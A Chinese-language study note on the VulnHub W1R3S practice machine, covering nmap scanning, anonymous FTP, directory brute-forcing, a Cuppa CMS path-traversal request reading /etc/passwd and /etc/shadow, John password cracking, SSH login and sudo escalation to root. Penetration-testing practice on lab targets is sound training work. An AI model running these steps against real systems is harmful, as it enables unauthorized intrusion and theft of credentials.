靶机实操—W1R3S—学习笔记
靶机下载地址:链接: https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
1、主机发现
在渗透测试开始之前,可以通过 nmap 扫描一遍,看一下哪些主机在线,开启靶机后再扫描一遍,通过比对得出哪台机器是渗透目标。
ip a # 查看IP
nmap -sn 网段/24 # 扫描在线主机
2、NMAP端口扫描及思路
在端口扫描时要注意两点:
- 全(所有端口不应该有遗漏)
- 准(扫描出的端口都开了哪些服务)
nmap --min-rate 10000 -p- 靶机IP # min-rate 最小速度 p 端口 -p- 所有端口
建议端口扫描至少两遍,之后针对扫描出的端口进行重点扫描
nmap -sT -sV -O -p 端口号 靶机IP # sT 用TCP协议扫描 sV 对扫描出的版本进行判断 O 对操作系统进行判断
nmap -sU -p 端口号 靶机IP # sU 用UDP协议
nmap漏洞脚本扫描,能够将一些特别容易的漏洞扫出来
nmap --script=vuln -p 端口号 IP
wordpress是一个用得较多的内容管理系统,后面渗透时可以重点关注一下。
3、FTP渗透
ftp 靶机IP
尝试 ftp 能否匿名登录
ftp 匿名登录:用户:anonymous,密码一般为空
能进入后,使用binary
命令,防止通过 ftp 下载时可执行文件损坏,查看里面的文件,通过 mget 拿下所有文件
然后查看下载的文件,并保存至笔记
分析文本内容,如02.txt文本存在加密内容,可以使用命令识别最可能的加密方式,再寻找使用对应工具解密
hash-identifier '加密内容'
也有可能不是加密方式而是编码方式,可以使用对应命令尝试解密,本次编码方式为 base64
echo '编码内容' | base64 -d # d 表示解码
如果文本里存在上下左右颠倒的内容,可以使用网络工具还原,链接: https://www.upsidedowntext.com/
4、Web目录爆破
21端口的 ftp 服务内容已经看完,接下来查看80端口的 http 服务,使用浏览器访问IP地址
常用目录爆破工具:gobuster
dirb
feroxbuster
sudo feroxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # u URL W 指定字典
5、Web渗透,本地文件包含利用
分析结果,打开wordpress
,将localhost
修改为靶机IP,如果没有东西,再去看administrator
在渗透时要认真测试,但也要及时出来,不要死磕
在前面访问时,发现该网站的CMS(内容管理系统)为Cuppa,因此使用searchsploit
搜索是否存在漏洞,如果存在则将其导出
searchsploit cuppa cms
searchsploit cuppa cms -m 25971 # 下载
查看漏洞详情
查看漏洞详情
浏览器访问链接:http://192.168.22.128/administrator/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd
利用漏洞
sudo curl --data-urlencode 参数 路径
在拿到/etc/passwd
后尝试获取/etc/shadow
6、John破解
新建一个hash文件,将可能的密码放入其中,尝试破解
john hash # john命令不能再次解密同一个文件,需再解密,执行命令rm -r /root/.john/john.pot删除john.pot文件
7、获得初级权限和立足点
使用ssh命令登录W1R3S用户
ssh 主机名@IP
查看状态
whoami # 是谁
uname -a # 系统状态
8、sudo提权
查看当前用户的权限
sudo -l # 列出目前的权限
sudo /bin/bash # 赋予 root 权限
获取/root
目录下的flag.txt
cd /root
cat flag.txt